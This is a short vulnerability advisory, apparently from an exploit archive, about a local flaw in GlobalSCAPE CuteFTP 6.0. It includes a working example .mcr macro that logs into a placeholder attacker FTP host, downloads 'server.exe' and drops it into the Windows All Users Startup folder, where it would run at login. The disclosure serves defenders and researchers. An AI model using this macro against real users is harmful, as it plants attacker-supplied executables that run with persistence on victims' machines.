GlobalSCAPE - CuteFTP macros (*.mcr) Local Vulnerability

2004-09-28 00:00:00

Application: GlobalSCAPE CuteFTP V6.0
http://www.globalscape.com/

Risk: Medium

/*
e-mail: [email protected]
web: http://www.prohack.net
*/

--The bug:

Atacker can create a crafted CuteFTP macro (*.mcr),
and when its loaded in the target computer, it can download the Arbitrary file
into the target users startup folder.

----example *.mcr macro----

Host FTP_HOST_HERE
Login Normal
User FTP_USER_HERE
Pass FTP_PASS_HERE
Connect
RemoteSelect server.exe
Download
LocalCwd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\


#

Fixes

No fixes

In order to submit a new fix you need to be registered.